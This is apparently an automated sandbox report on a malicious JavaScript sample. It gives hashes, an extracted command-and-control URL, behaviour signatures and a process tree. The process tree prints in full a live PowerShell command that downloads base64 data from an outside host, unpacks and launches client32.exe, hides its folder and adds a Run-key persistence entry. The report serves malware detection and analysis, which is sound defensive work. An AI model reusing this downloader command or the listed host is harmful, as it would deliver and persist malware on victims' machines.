Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
07-05-2024 01:34
Static task
static1
Behavioral task
behavioral1
Sample
79d564f2de35ca6b1b9d78498019b00f8b3a0b231d619317cdf3bdf2615ba0aa.js
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
79d564f2de35ca6b1b9d78498019b00f8b3a0b231d619317cdf3bdf2615ba0aa.js
Resource
win10v2004-20240226-en
General
-
Target
79d564f2de35ca6b1b9d78498019b00f8b3a0b231d619317cdf3bdf2615ba0aa.js
-
Size
13.8MB
-
MD5
9bf4be608d90edf6891ce6b99b9db4cb
-
SHA1
443e8e9c857c554e5723bc6b408bf8365b450749
-
SHA256
79d564f2de35ca6b1b9d78498019b00f8b3a0b231d619317cdf3bdf2615ba0aa
-
SHA512
2b84c254971ece8d18c3c3ab36fe32976c279c15463e7704302ba2baec913f1c308e09970935ac6bc75b2f4a879ef6bfb510ae70230a3c6d5b2f7234a657ab13
-
SSDEEP
49152:87V7zjCxbzqHlp4LhyN0kghDzLZzjYzYsmCW+8z2V35//9SGGqHm3quVIKXgxcE/:6
Malware Config
Extracted
https://pdd888167.top/data.php?11210
https://pdd888167.top/data.php?11210
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2660 powershell.exe 6 2660 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2660 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2660 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2660 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2368 wrote to memory of 2660 2368 wscript.exe 28 PID 2368 wrote to memory of 2660 2368 wscript.exe 28 PID 2368 wrote to memory of 2660 2368 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\79d564f2de35ca6b1b9d78498019b00f8b3a0b231d619317cdf3bdf2615ba0aa.js1⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $IauVJuNNbhStwDjcZTDS='https://pdd888167.top/data.php?11210';$gxsysUJlYwYwPSkgVPNwnoyBpx=(New-Object System.Net.WebClient).DownloadString($IauVJuNNbhStwDjcZTDS);$vEQcpgZIPFWfVqfsgcfCh=[System.Convert]::FromBase64String($gxsysUJlYwYwPSkgVPNwnoyBpx);$zxc = Get-Random -Minimum -10 -Maximum 37; $LlmVqmBaLDT=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $LlmVqmBaLDT -PathType Container)) { New-Item -Path $LlmVqmBaLDT -ItemType Directory };$p=Join-Path $LlmVqmBaLDT 'ah.zip';[System.IO.File]::WriteAllBytes($p,$vEQcpgZIPFWfVqfsgcfCh);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LlmVqmBaLDT)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LlmVqmBaLDT 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $LlmVqmBaLDT -Force; $AZ.attributes='Hidden';$s=$LlmVqmBaLDT+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2660
-